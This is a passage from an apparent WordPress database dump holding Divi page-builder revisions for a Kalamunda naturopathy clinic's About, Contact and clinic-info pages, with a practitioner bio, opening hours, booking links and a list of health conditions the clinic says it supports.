admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2022-01-21 12:21:54','2022-01-21 04:21:54','',27,'https://verdenaturopathy.com.au/?p=375',0,'revision','',0),(387,1,'2022-10-21 13:06:04','2022-10-21 05:06:04','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available.</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2022-10-21 13:06:04','2022-10-21 05:06:04','',26,'https://verdenaturopathy.com.au/?p=387',0,'revision','',0),(388,1,'2022-10-21 13:11:32','2022-10-21 05:11:32','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2022-10-21 13:11:32','2022-10-21 05:11:32','',188,'https://verdenaturopathy.com.au/?p=388',0,'revision','',0),(382,1,'2022-06-30 08:34:29','2022-06-30 00:34:29','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: 